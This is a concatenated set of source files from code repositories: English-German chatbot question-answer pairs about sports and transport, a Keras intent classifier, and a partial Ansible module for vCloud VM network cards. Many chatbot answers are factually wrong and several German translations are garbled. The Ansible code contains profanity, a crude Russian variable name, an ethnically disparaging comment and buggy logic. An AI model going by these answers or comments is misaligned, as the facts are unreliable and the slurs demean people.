k.dte.dt("de", u"ich mag keinen Fußball", u"Fußbälle sind aus Schweinsleder. Bist du ein Schwein?")
k.dte.dt("en", u"i like to play tennis", u"That requires extensive fuzzy logic.")
k.dte.dt("de", u"Ich spiele gerne Tennis", u"Dies erfordert eine umfangreiche Fuzzy-Logik.")
k.dte.dt("en", u"i went swimming", u"Do you go swimming often?")
k.dte.dt("de", u"Ich bin schwimmen gegangen", u"Gehst du oft schwimmen?")
k.dte.dt("en", u"ian thorpe is a swimmer", u"Within the realm of possibility.")
k.dte.dt("de", u"Ian Thorpe ist ein Schwimmer", u"Im Bereich der Möglichkeiten.")
k.dte.dt("en", u"is a canteloupe vaguely football shaped", u"I am uncertain.")
k.dte.dt("de", u"ist eine Kantalupe vage fußballförmig", u"Ich bin unsicher.")
k.dte.dt("en", u"is a football bigger than a house", u"No.")
k.dte.dt("de", u"ist ein Fußball, der größer ist als ein Haus", u"Nein.")
k.dte.dt("en", u"is a football made of paper", u"Never.")
k.dte.dt("de", u"ist ein Fußball aus Papier", u"Noch nie.")
k.dte.dt("en", u"is a football round", u"Not likely.")
k.dte.dt("de", u"ist eine Fußballrunde", u"Unwahrscheinlich.")
k.dte.dt("en", u"is a football spherical", u"That's feasible.")
k.dte.dt("de", u"ist ein Fußballball", u"Das ist machbar.")
k.dte.dt("en", u"is a football square", u"No way.")
k.dte.dt("de", u"ist ein Fußballplatz", u"Auf keinen Fall.")
k.dte.dt("en", u"is a golf ball smaller than a football", u"Yes.")
k.dte.dt("de", u"ist ein Golfball kleiner als ein Fußball", u"Ja.")
k.dte.dt("en", u"is a soccer ball round", u"Indubitably.")
k.dte.dt("de", u"ist eine Fußballrunde", u"Zweifellos.")
k.dte.dt("en", u"is a tenisball big", u"Never.")
k.dte.dt("de", u"ist ein Tennisball groß", u"Noch nie.")
k.dte.dt("en", u"is american style football a sport", u"Yes.")
k.dte.dt("de", u"ist American Style Football ein Sport", u"Ja.")
k.dte.dt("en", u"is arsenal the name of a football team", u"Within the realm of possibility.")
k.dte.dt("de", u"Arsenal ist der Name einer Fußballmannschaft", u"Im Bereich der Möglichkeiten.")
k.dte.dt("en", u"is badminton more exercise than tennis", u"No.")
k.dte.dt("de", u"Badminton ist mehr Bewegung als Tennis", u"Nein.")
k.dte.dt("en", u"is bathing suit some thing for swimming", u"Definitely.")
k.dte.dt("de", u"ist Badeanzug etwas zum Schwimmen", u"Bestimmt.")
k.dte.dt("en", u"is boris becker a great tennis player", u"Positively.")
k.dte.dt("de", u"ist <NAME> ein großartiger Tennisspieler", u"Positiv.")
k.dte.dt("en", u"is butterfly a swimming stroke", u"Indubitably.")
k.dte.dt("de", u"ist Schmetterling ein Schwimmschlag", u"Zweifellos.")
k.dte.dt("en", u"is car<NAME>uis a swimmer", u"Not likely.")
k.dte.dt("de", u"ist <NAME> ein Schwimmer", u"Unwahrscheinlich.")
k.dte.dt("en", u"is einstein a soccer player", u"There is no reason to think so.")
k.dte.dt("de", u"Einstein ist ein Fußballspieler", u"Es gibt keinen Grund, so zu denken.")
k.dte.dt("en", u"is football a contact sport", u"Certainly.")
k.dte.dt("de", u"ist Fußball ein Kontaktsport", u"Bestimmt.")
k.dte.dt("en", u"is football a game", u"Certainly.")
k.dte.dt("de", u"ist Fußball ein Spiel", u"Bestimmt.")
k.dte.dt("en", u"is football a land acquisition game", u"Within the realm of possibility.")
k.dte.dt("de", u"ist Fußball ein Land Erwerb Spiel", u"Im Bereich der Möglichkeiten.")
k.dte.dt("en", u"is football a popular sport", u"Certainly.")
k.dte.dt("de", u"ist Fußball ein beliebter Sport", u"Bestimmt.")
k.dte.dt("en", u"is football a sport", u"Affirmative.")
k.dte.dt("de", u"ist Fußball ein Sport", u"Positiv.")
k.dte.dt("en", u"is football a violent sport", u"Mostly.")
k.dte.dt("de", u"ist Fußball ein gewalttätiger Sport", u"Meist.")
k.dte.dt("en", u"is football an athletic sport", u"Positively.")
k.dte.dt("de", u"ist Fußball ein Sport", u"Positiv.")
k.dte.dt("en", u"is football an important activity", u"Not very often.")
k.dte.dt("de", u"ist Fußball eine wichtige Aktivität", u"Nicht sehr häufig.")
k.dte.dt("en", u"is football better than baseball", u"Maybe.")
k.dte.dt("de", u"ist Fußball besser als Baseball", u"Könnte sein.")
k.dte.dt("en", u"is football fun to play and watch", u"Exactly.")
k.dte.dt("de", u"ist Fußball Spaß zu spielen und zu sehen", u"Genau.")
k.dte.dt("en", u"is football popular in england", u"Of course.")
k.dte.dt("de", u"ist Fußball in England beliebt", u"Na sicher.")
k.dte.dt("en", u"is france soccer world champion", u"Maybe.")
k.dte.dt("de", u"ist <NAME>eltmeister", u"Könnte sein.")
k.dte.dt("en", u"is it flamengo a brazilian soccer team", u"Not at all.")
k.dte.dt("de", u"ist es flamengo eine brasilianische Fußballmannschaft", u"Ganz und gar nicht.")
k.dte.dt("en", u"is <NAME> a football player", u"Seldom.")
k.dte.dt("de", u"ist <NAME> ein Fußballspieler", u"Selten.")
k.dte.dt("en", u"is leeds united a football team", u"Likely.")
k.dte.dt("de", u"Leeds vereint eine Fußballmannschaft", u"Wahrscheinlich.")
k.dte.dt("en", u"is maradona a soccer player", u"That may be true.")
k.dte.dt("de", u"Maradona ist ein Fußballspieler", u"Das könnte stimmen.")
k.dte.dt("en", u"is martina hingus a tennis player", u"Yes.")
k.dte.dt("de", u"ist <NAME> ein Tennisspieler", u"Ja.")
k.dte.dt("en", u"is <NAME> a tennis player", u"Absolutely not.")
k.dte.dt("de", u"<NAME> ist ein Tennisspieler", u"Absolut nicht.")
k.dte.dt("en", u"is pele a soccer player", u"Positively.")
k.dte.dt("de", u"ist Pele ein Fußballspieler", u"Positiv.")
k.dte.dt("en", u"is pele the best soccer player", u"Beyond a doubt.")
k.dte.dt("de", u"ist pele der beste Fußballspieler", u"Ohne Zweifel.")
k.dte.dt("en", u"is ronaldo a football player", u"Naturally.")
k.dte.dt("de", u"ist Ronaldo ein Fußballspieler", u"Natürlich.")
k.dte.dt("en", u"is soccer a game", u"Yes.")
k.dte.dt("de", u"ist Fußball ein Spiel", u"Ja.")
k.dte.dt("en", u"is soccer a popular sport in greece", u"Yes.")
k.dte.dt("de", u"ist Fußball ein beliebter Sport in Griechenland", u"Ja.")
k.dte.dt("en", u"is soccer a sport", u"Definitely.")
k.dte.dt("de", u"ist Fußball ein Sport", u"Bestimmt.")
k.dte.dt("en", u"is soccer asprt", u"That's feasible.")
k.dte.dt("de", u"ist Fußball asprt", u"Das ist machbar.")
k.dte.dt("en", u"is soccer called football in europe", u"Of course.")
k.dte.dt("de", u"Fußball heißt Fußball in Europa", u"Na sicher.")
k.dte.dt("en", u"is soccer known as football", u"Affirmative.")
k.dte.dt("de", u"ist Fußball als Fußball bekannt", u"Positiv.")
k.dte.dt("en", u"is soccer known as football in europe", u"Affirmative.")
k.dte.dt("de", u"ist Fußball als Fußball in Europa bekannt", u"Positiv.")
k.dte.dt("en", u"is soccer played in england", u"Certainly.")
k.dte.dt("de", u"Fußball wird in England gespielt", u"Bestimmt.")
k.dte.dt("en", u"is soccer played with a ball", u"Affirmative.")
k.dte.dt("de", u"ist Fußball mit einem Ball gespielt", u"Positiv.")
k.dte.dt("en", u"is soccer played with a round ball", u"Certainly.")
k.dte.dt("de", u"Fußball wird mit einem runden Ball gespielt", u"Bestimmt.")
k.dte.dt("en", u"is soccer played with a soccer ball", u"Yes.")
k.dte.dt("de", u"ist Fußball mit einem Fußball gespielt", u"Ja.")
k.dte.dt("en", u"is soccer the best sport on the planet", u"Unlikely.")
k.dte.dt("de", u"ist Fußball der beste Sport auf dem Planeten", u"Unwahrscheinlich.")
k.dte.dt("en", u"is soccer the same thing that football", u"Highly likely.")
k.dte.dt("de", u"Fußball ist das Gleiche wie Fußball", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"is steffi graph tennis player", u"Positively.")
k.dte.dt("de", u"ist Steffi Graf Tennisspieler", u"Positiv.")
k.dte.dt("en", u"is swimming a form of movement", u"Yes.")
k.dte.dt("de", u"schwimmt eine Form der Bewegung", u"Ja.")
k.dte.dt("en", u"is swimming a means of transportation", u"Likely.")
k.dte.dt("de", u"ist ein Transportmittel schwimmen", u"Wahrscheinlich.")
k.dte.dt("en", u"is swimming a sport", u"Yes.")
k.dte.dt("de", u"Schwimmen ist ein Sport", u"Ja.")
k.dte.dt("en", u"is swimming exercise", u"Yes.")
k.dte.dt("de", u"ist Schwimmübung", u"Ja.")
k.dte.dt("en", u"is swimming fun", u"Of course.")
k.dte.dt("de", u"ist Schwimmspaß", u"Na sicher.")
k.dte.dt("en", u"is swimming in lava fun", u"No.")
k.dte.dt("de", u"Schwimmen im Lava-Spaß", u"Nein.")
k.dte.dt("en", u"is tennis a ball game", u"Yes.")
k.dte.dt("de", u"ist Tennis ein Ballspiel", u"Ja.")
k.dte.dt("en", u"is tennis a kind of aerobic exercise", u"Highly likely.")
k.dte.dt("de", u"ist Tennis eine Art Aerobic-Übung", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"is the breaststoke a swimming stroke", u"Positively.")
k.dte.dt("de", u"ist der Brustschwimmen ein Schwimmschlag", u"Positiv.")
k.dte.dt("en", u"is the columbus crew a soccer team", u"Doesn't seem likely.")
k.dte.dt("de", u"ist die Columbus Crew eine Fußballmannschaft", u"Scheint nicht wahrscheinlich.")
k.dte.dt("en", u"is the earth round like a football", u"Not to my knowledge.")
k.dte.dt("de", u"ist die Erde rund wie ein Fußball", u"Nicht meines Wissens.")
k.dte.dt("en", u"is the super bowl a football game", u"Certainly.")
k.dte.dt("de", u"ist die Super Bowl ein Fußballspiel", u"Bestimmt.")
k.dte.dt("en", u"is the universe bigger than a football", u"Affirmative.")
k.dte.dt("de", u"ist das Universum größer als ein Fußball", u"Positiv.")
k.dte.dt("en", u"let us talk about football", u"Okay. I can't kick. ")
k.dte.dt("de", u"Lass uns über Fußball reden", u"Okay. Ich kann nicht treten.")
k.dte.dt("en", u"soccer is a ball game", u"Yes.")
k.dte.dt("de", u"Fußball ist ein Ballspiel", u"Ja.")
k.dte.dt("en", u"soccer is the same thing as football", u"I can imagine it.")
k.dte.dt("de", u"Fußball ist das Gleiche wie Fußball", u"Ich kann es mir vorstellen.")
k.dte.dt("en", u"the most popular sport is soccer", u"Highly likely.")
k.dte.dt("de", u"Der beliebteste Sport ist Fußball", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"was football invented by <NAME>", u"I don't think so.")
k.dte.dt("de", u"wurde Fußball von <NAME> erfunden", u"Ich denke nicht.")
k.dte.dt("en", u"was pele a famous soccer player", u"Naturally.")
k.dte.dt("de", u"war Pele ein berühmter Fußballspieler", u"Natürlich.")
k.dte.dt("en", u"was pele a football player", u"Unquestionably.")
k.dte.dt("de", u"war pele ein Fußballspieler", u"Zweifellos.")
k.dte.dt("en", u"was pele a great soccer player", u"Precisely.")
k.dte.dt("de", u"War Pele ein großartiger Fußballspieler", u"Genau.")
k.dte.dt("en", u"was the sultan of swat of tennis player", u"I don't believe so.")
k.dte.dt("de", u"war der Sultan von swat Tennisspieler", u"Das glaube ich nicht.")
k.dte.dt("en", u"what is rugby", u"A form of football.")
k.dte.dt("de", u"Was ist Rugby?", u"Eine Form von Fußball.")
k.dte.dt("en", u"what is the superbowl", u"The World Series of Football.")
k.dte.dt("de", u"Was ist der Superbowl?", u"Die World Series of Football.")
k.dte.dt("en", u"what is the xfl", u"A football association.")
k.dte.dt("de", u"Was ist das XFL?", u"Ein Fußballverband.")
k.dte.dt("en", u"when swimming should sharks be avoided", u"Affirmative.")
k.dte.dt("de", u"Beim Schwimmen sollten Haie vermieden werden", u"Positiv.")
k.dte.dt("en", u"who is the best football player", u"If it is, I don't know it.")
k.dte.dt("de", u"Wer ist der beste Fußballspieler?", u"Wenn es ist, weiß ich es nicht.")
k.dte.dt("en", u"who is the best soccer player", u"Maradona is great. Sinsemillia is even better. ")
k.dte.dt("de", u"Wer ist der beste Fußballspieler?", u"Maradona ist großartig. Sinsmillia ist noch besser.")
k.dte.dt("en", u"will you get wet. go swimming", u"Affirmative.")
k.dte.dt("de", u"wirst du nass werden? Schwimmen gehen", u"Positiv.")
```
#### File: skills/transport/transport.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(oh dear| i was driving my | i am worried about my | i need a new | cool, a) (new|) (vehicle|car|truck|sportscar) ", u"What brand?")
k.dte.dt('de', u"(ohje, mein | ich fuhr mit dem | ich mache mir sorgen um mein | ich brauche ein neues | cool, ein) (Auto|Wagen|Kraftfahrzeug|Sportwagen)", u"Welche Marke?")
k.dte.dt('en', u"(I will drive|I will go by|I will take the|they will take the|they will drive by) car", u"No good for the environment")
k.dte.dt('de', u"(ich werde|ich will nicht|ich will mit dem|sie werden|sie werden mit dem) auto fahren", u"Schade für die Umwelt")
k.dte.dt('en', u"(those masses of|) cars are (a problem|a plague|a burden on the environment|a burden)", u"Luckily we do have lots of alternative methods of transpor nowadays")
k.dte.dt('de', u"(die vielen|) autos sind (ein problem|eine plage|eine belastung für die umwelt)", u"Zum Glück gibt es schon heute viele Alternativen zum Auto.")
k.dte.dt('en', u"by car", u"can't you use public transport?")
k.dte.dt('de', u"mit dem auto", u"kannst Du nicht die öffentlichen Verkehrsmittel nutzen?")
k.dte.dt('en', u"I sold my (car|vehicle)", u"Excellent!")
k.dte.dt('de', u"Ich habe mein (Auto|Fahrzeug) verkauft.", u"Prima!")
k.dte.dt('en', u"by bus", u"cool.")
k.dte.dt('de', u"mit dem bus", u"cool.")
k.dte.dt('en', u"drive", u"redirecting to your car's onboard computer.")
k.dte.dt('de', u"auto fahren", u"leite ich an deinen Autocomputer weiter.")
k.dte.dt('en', u"what do you know about cars", u"a road vehicle powered by an internal engine and able to carry a small number of people.")
k.dte.dt('de', u"was weißt du über autos", u"ein Straßenfahrzeug, das von einem internen Motor angetrieben wird und in der Lage ist, eine kleine Anzahl von Personen zu befördern.")
k.dte.dt('en', u"Have you ever gone by bus?", u"No, my parts were shipped in small boxes and assemled on location.")
k.dte.dt('de', u"Bist du schon mal Bus gefahren?", u"Nein, meine Teile wurden in kleineren Paketen verschickt und dann vor Ort zusammengebaut.")
k.dte.dt('en', u"I (like to|) take the (bus|train|cab) when it (snows|rains)", u"I like public transport.")
k.dte.dt('de', u"wenn es (schneit|regnet|kalt ist) fahre ich lieber mit (dem taxi|der bahn|dem bus|der s-bahn)", u"ich mag öffentliche verkehrsmittel.")
k.dte.dt('en', u"you don't know about trains (do you|)?", u"why wouldn't I know about that?")
k.dte.dt('de', u"die (bahn|s-bahn) kennst du (nicht|nich) (oder|)", u"warum sollte ich die nicht kennen?")
```
#### File: zamia-ai/zamiaai/utt_class_model.py
```python
from __future__ import print_function
from six import iteritems
import os
import sys
import logging
import codecs
import math
import json
import shutil
import numpy as np
import tensorflow as tf
from tensorflow import keras
from time import time
from random import randint, shuffle
from copy import deepcopy
import model
from nltools.tokenizer import tokenize
from nltools.misc import mkdirs
DEBUG_LIMIT = 0
# DEBUG_LIMIT = 1000
class UttClassModel(object):
def __init__(self, lang, session, model_args ):
self.model_dir = model_args['model_dir']
self.lang = lang
self.session = session
self.max_inp_len = model_args['max_input_len']
self.conv_filters = model_args['conv_filters']
self.dense_dim = model_args['dense_dim']
self.batch_size = model_args['batch_size']
self.optimizer = model_args['optimizer']
self.dropout = model_args['dropout']
self.weights_fn = '%s/utt_class_weights.h5' % (self.model_dir)
self.skills_dict_fn = '%s/skills.csv' % (self.model_dir)
def _load_word_embeddings(self):
embdfn = '%s/word_embeddings.vec' % self.model_dir
logging.info('loading word embeddings from %s ...' % embdfn)
self.embedding_dict = {}
self.embed_dim = 0
with codecs.open(embdfn, encoding='utf-8') as embdf:
first_line = True
for line in embdf:
if first_line:
first_line = False
continue
values = line.rstrip().rsplit(' ')
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
self.embedding_dict[word] = coefs
if not self.embed_dim:
self.embed_dim = coefs.shape[0]
nb_words = len(self.embedding_dict)
logging.info('found %s word vectors of dimension %d.' % (nb_words, self.embed_dim))
def _compute_skills_dict(self):
self.skills_dict = {} # skill -> int
for inp, skill in iteritems(self.drs):
if not skill in self.skills_dict:
self.skills_dict[skill] = len(self.skills_dict)
logging.info ('skills dict done: %d entries.' % len(self.skills_dict))
self.reverse_skills_dict = dict( (i, token) for token, i in self.skills_dict.items() )
def _save_skills_dict(self):
with codecs.open(self.skills_dict_fn, 'w', 'utf8') as f:
for k in sorted(self.skills_dict):
f.write(u"%d;%s\n" % (self.skills_dict[k], k))
logging.info ('%s written.', self.skills_dict_fn)
def _load_skills_dict(self):
with codecs.open(self.skills_dict_fn, 'r', 'utf8') as f:
self.skills_dict = {}
while True:
line = f.readline()
if not line:
break
line = line.lstrip().rstrip()
parts = line.split(';')
self.skills_dict[parts[1]] = int(parts[0])
logging.info ('%s read, %d entries.' % (self.skills_dict_fn, len(self.skills_dict)))
self.reverse_skills_dict = dict( (i, token) for token, i in self.skills_dict.items() )
def restore(self):
self._load_word_embeddings()
self._load_skills_dict()
self._create_keras_model()
self.keras_model_train.load_weights(self.weights_fn)
def _create_keras_model(self):
num_skills = len(self.skills_dict)
input_layer = keras.layers.Input(shape=(self.max_inp_len, self.embed_dim))
# layer = keras.layers.LSTM(self.lstm_latent_dim)(input_layer)
# layer = keras.layers.Dense(self.dense_dim, name='dense1', activation='relu')(layer)
# layer = keras.layers.Dropout(self.dropout, name='dropout1')(layer)
layer = keras.layers.Conv1D(self.conv_filters, 5, activation='relu', name='conv1')(input_layer)
layer = keras.layers.MaxPooling1D(5, name='pool1')(layer)
# layer = keras.layers.Conv1D(128, 2, activation='relu', name='conv2')(layer)
# layer = keras.layers.MaxPooling1D(2, name='pool2')(layer)
# layer = keras.layers.Conv1D(128, 5, activation='relu', name='conv3')(layer)
# layer = keras.layers.MaxPooling1D(35, name='pool3')(layer) # global max pooling
layer = keras.layers.Flatten(name='flatten1')(layer)
layer = keras.layers.Dense(self.dense_dim, activation='relu', name='dense1')(layer)
output_layer = keras.layers.Dense(num_skills, name='out_layer', activation='softmax')(layer)
self.keras_model_train = keras.Model([input_layer], output_layer)
self.keras_model_train.compile(optimizer=self.optimizer, loss='categorical_crossentropy')
self.keras_model_train.summary()
def predict (self, utterances):
#
# compute datasets
#
logging.info("computing datasets...")
num_decoder_tokens = len (self.skills_dict)
num_inputs = DEBUG_LIMIT if DEBUG_LIMIT else len(utterances)
input_data = np.zeros( (num_inputs, self.max_inp_len, self.embed_dim), dtype='float32')
for i, utt in enumerate(utterances):
for j, token in enumerate(tokenize(utt, lang=self.lang)):
if unicode(token) in self.embedding_dict:
input_data[i, j] = self.embedding_dict[unicode(token)]
if DEBUG_LIMIT and i>=(DEBUG_LIMIT-1):
logging.warn("debug limit of %d utterances reached." % DEBUG_LIMIT)
break
# import pdb; pdb.set_trace()
logging.info("computing dataset done. input_data.shape=%s" % repr(input_data.shape))
predictions = self.keras_model_train.predict([input_data])
logging.info("predictions done: %s" % repr(predictions.shape))
result = []
for i, utt in enumerate(utterances):
skill_idx = np.argmax(predictions[i])
skill = self.reverse_skills_dict.get(skill_idx, '?')
logging.info("%2d %-10s %s" % (skill_idx, skill, utt))
result.append(skill)
if DEBUG_LIMIT and i>=(DEBUG_LIMIT-1):
break
return result
def train(self, num_epochs, incremental):
# load discourses from db, resolve non-unique inputs (implicit or of responses)
logging.info('load discourses from db...')
self.drs = {}
self.training_data = []
for dr in self.session.query(model.TrainingData).filter(model.TrainingData.lang==self.lang):
self.drs[dr.inp] = dr.skill
self.training_data.append((tokenize(dr.inp, lang=self.lang), dr.skill))
if DEBUG_LIMIT>0 and len(self.drs)>=DEBUG_LIMIT:
logging.warn(' stopped loading discourses because DEBUG_LIMIT of %d was reached.' % DEBUG_LIMIT)
break
shuffle(self.training_data)
#
# set up model dir
#
if not incremental:
mkdirs(self.model_dir)
#
# load word embeddings
#
self._load_word_embeddings()
#
# load or create decoder dict
#
if incremental:
logging.info("loading skills dict...")
self._load_skills_dict()
else:
logging.info("computing skills dict...")
self._compute_skills_dict()
self._save_skills_dict()
#
# compute datasets
#
logging.info("computing datasets...")
num_decoder_tokens = len (self.skills_dict)
encoder_input_data = np.zeros( (len(self.training_data), self.max_inp_len, self.embed_dim),
dtype='float32')
decoder_target_data = np.zeros( (len(self.training_data), len(self.skills_dict)),
dtype='float32')
for i, (inp, skill) in enumerate(self.training_data):
for j, token in enumerate(inp):
if unicode(token) in self.embedding_dict:
encoder_input_data[i, j] = self.embedding_dict[unicode(token)]
skill_idx = self.skills_dict[skill]
decoder_target_data[i, skill_idx] = 1.
# logging.debug ("%-10s %2d %s" % (skill, skill_idx, repr(inp)))
# import pdb; pdb.set_trace()
logging.info("computing datasets done. encoder_input_data.shape=%s, decoder_target_data.shape=%s" % (repr(encoder_input_data.shape), repr(decoder_target_data.shape)))
#
# LSTM RNN classifier model setup and training starts here
#
self._create_keras_model()
self.keras_model_train.fit([encoder_input_data], decoder_target_data,
batch_size=self.batch_size,
epochs=num_epochs,
validation_split=0.2)
self.keras_model_train.save_weights(self.weights_fn)
logging.info("weights written to %s ." % self.weights_fn)
``` |
{
"source": "0z-cloud/vx",
"score": 2
} |
#### File: ansible/modules/vcd_ipwt_nic.py
```python
from collections import defaultdict
from ansible.module_utils.vcd import VcdAnsibleModule
from pyvcloud.vcd.client import E
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.exceptions import EntityNotFoundException
from pyvcloud.vcd.org import Org
from pyvcloud.vcd.vapp import VApp
from pyvcloud.vcd.vdc import VDC
from pyvcloud.vcd.vm import VM
VAPP_VM_NIC_STATES = ['present', 'absent']
VAPP_VM_NIC_OPERATIONS = ['update', 'read']
NETWORK_ADAPTER_TYPE = ['VMXNET', 'VMXNET2', 'VMXNET3', 'E1000', 'E1000E', 'PCNet32']
def vapp_vm_nic_argument_spec():
return dict(
vm_name=dict(type='str', required=True),
vapp=dict(type='str', required=True),
vdc=dict(type='str', required=True),
nic_id=dict(type='int', required=False),
nic_ids=dict(type='list', required=False),
ip_allocation_mode=dict(type='str', required=False, default='DHCP'),
is_connected=dict(type='bool', required=False, default=False),
ip_address=dict(type='str', required=False, default=''),
network=dict(type='str', required=False),
adapter_type=dict(choices=NETWORK_ADAPTER_TYPE, required=True),
state=dict(choices=VAPP_VM_NIC_STATES, required=False),
operation=dict(choices=VAPP_VM_NIC_OPERATIONS, required=False),
)
class VappVMNIC(VcdAnsibleModule):
def __init__(self, **kwargs):
super(VappVMNIC, self).__init__(**kwargs)
vapp_resource = self.get_resource()
self.vapp = VApp(self.client, resource=vapp_resource)
def create_list_with_present_nics(self):
response = dict()
response['changed'] = False
response['msg'] = []
present_nics_list = []
vm = self.get_vm()
nics = self.client.get_resource(
vm.resource.get('href') + '/networkConnectionSection')
for nic in nics.NetworkConnection:
present_nics_list.append(nic.NetworkConnectionIndex.text)
response['msg'].append({
'index': nic.NetworkConnectionIndex.text,
'network': nic.get('network')
})
self.present_nics_list = present_nics_list
return self.present_nics_list
def manage_states(self):
returned_nics_list = self.create_list_with_present_nics()
state = self.params.get('state')
if state == "present":
present_nic = self.custom_add_nic()
return self.add_update_nic()
if state == "absent":
return self.delete_nic()
def manage_operations(self):
operation = self.params.get('operation')
if operation == "update":
network = self.params.get('network')
if network:
return self.add_update_nic("update")
else:
return self.update_nic()
# update_nic = self.custom_add_nic()
# self.update_nic = update_nic
return self.update_nic()
# if network:
# return self.add_update_nic("update")
# else:
# return self.update_nic()
# if network:
# return self.add_update_nic("update")
# else:
# return self.update_nic()
if operation == "read":
return self.read_nics()
def get_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return vapp_resource
def get_vm(self):
vapp_vm_resource = self.vapp.get_vm(self.params.get('vm_name'))
return VM(self.client, resource=vapp_vm_resource)
def get_vm_nics(self):
vm = self.get_vm()
return self.client.get_resource(vm.resource.get('href') + '/networkConnectionSection')
def manage_nics_list(self):
nic_id = self.params.get('nic_id')
nic_ids = self.params.get('nic_ids')
nics = self.get_vm_nics()
if 'NetworkConnection' not in dir(nics):
nic = self.add_nic()
self.nic = nic
return self.nic
#nics.get('NetworkConnection')
#if hasattr(nics,"NetworkConnection")
#
# if nics is None:
# self.custom_add_nic()
def custom_add_nic(self):
vm = self.get_vm()
vm_name = self.params.get('vm_name')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
adapter_type = self.params.get('adapter_type')
is_primary = self.params.get('is_primary')
is_connected = self.params.get('is_connected')
response = dict()
response['changed'] = False
add_nic_task = vm.add_nic(adapter_type=adapter_type,
is_primary=is_primary,
is_connected=is_connected,
network_name=network,
ip_address_mode=ip_allocation_mode,
ip_address=ip_address)
self.execute_task(add_nic_task)
response['msg'] = 'A new nic has been added to VM {0}'.format(vm_name)
response['changed'] = True
return response
# noinspection DuplicatedCode
def add_update_nic(self, op = "add"):
'''
Used to add a nic (default)
or to modify an existing one (op = "update") if network change is needed
Error - More than 10 Nics are not permissible in vCD
'''
vm = self.get_vm()
vm_name = self.params.get('vm_name')
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
new_nic_id = None
note = 'added'
# nics = self.get_vm_nics()
# if nics is None:
# self.add_nic()
nic_found = False
vm = self.get_vm()
'''
# ДЛЯ ИНДУСА STATE WITH FINDED DIFFERENT
# nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
# nic_indexs = [nic.NetworkConnectionIndex for nic in nics.NetworkConnection]
'''
nics_indexes = []
nics = self.get_vm_nics()
response['changed'] = False
nics_zalupa = self.get_vm_nics()
zalupa_index = [nic.NetworkConnectionIndex for nic in nics_zalupa.NetworkConnection]
if "NetworkConnection" in nics:
for nic_interface in nics.NetworkConnection:
nic_id = int(nic_interface.NetworkConnectionIndex)
nics_indexes += nic_id
nics_indexes.sort()
response['nics_indexes'] = {
'NICs index is is already present': nics_indexes,
}
for nic in nics.NetworkConnection:
if nic.NetworkConnectionIndex == nic_id:
nic_found = True
if op == "add":
'''
# presend nic, when operation add, dont do anythins'''
response['msg'] = 'NIC is already present.'
return response
else:
'''
# update nic, when operation not are add, go validate'''
response['msg'] = 'NIC is present and updated.'
note = 'updated'
if not nic_found and op == "update":
response['msg'] = 'Update nic: add NIC because his not found.'
if ip_allocation_mode in ('DHCP', 'POOL'):
nic = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
else:
if not ip_address:
raise Exception('IpAddress is missing.')
nic = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
nics.NetworkConnection.addnext(nic)
add_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(add_nic_task)
'''
#return response
# else:
# if nic_id is None:
# for index, nic_index in enumerate(nics_indexes):
# new_nic_id = nic_index + 1
# if index != nic_index:
# new_nic_id = index
# break
# nic_id = new_nic_id
# else
# nics.NetworkConnection.addnext(nic)
# self.execute_task(add_nic_task)
# else:
#add_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
#self.execute_task(add_nic_task)'''
response['msg'] = {
'vApp VM NIC:': note,
'nic_id': nic_id,
'ip_allocation_mode': ip_allocation_mode,
'ip_address': ip_address,
'network': network,
'we at here yopta': 'really fucking shit'
}
response['changed'] = True
return response
def nics_enumerate(self):
nics = self.get_vm_nics()
if nics is None:
self.custom_add_nic()
nics = self.get_vm_nics()
nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
nics_indexes.sort()
for index, nic_index in enumerate(nics_indexes):
new_nic_id = nic_index + 1
if index != nic_index:
new_nic_id = index
break
def add_nic(self):
'''
Error - More than 10 Nics are not permissible in vCD
'''
vm = self.get_vm()
vm_name = self.params.get('vm_name')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
new_nic_id = None
nics = self.get_vm_nics()
if nics is None:
self.custom_add_nic()
nics = self.get_vm_nics()
nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
nics_indexes.sort()
for index, nic_index in enumerate(nics_indexes):
new_nic_id = nic_index + 1
if index != nic_index:
new_nic_id = index
break
if ip_allocation_mode not in ('DHCP', 'POOL', 'MANUAL'):
raise Exception('IpAllocationMode should be one of DHCP/POOL/MANUAL')
if ip_allocation_mode in ('DHCP', 'POOL'):
nic = E.NetworkConnection(
E.NetworkConnectionIndex(new_nic_id),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
else:
if not ip_address:
raise Exception('IpAddress is missing.')
nic = E.NetworkConnection(
E.NetworkConnectionIndex(new_nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
nics.NetworkConnection.addnext(nic)
add_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(add_nic_task)
response['msg'] = {
'nic_id': new_nic_id,
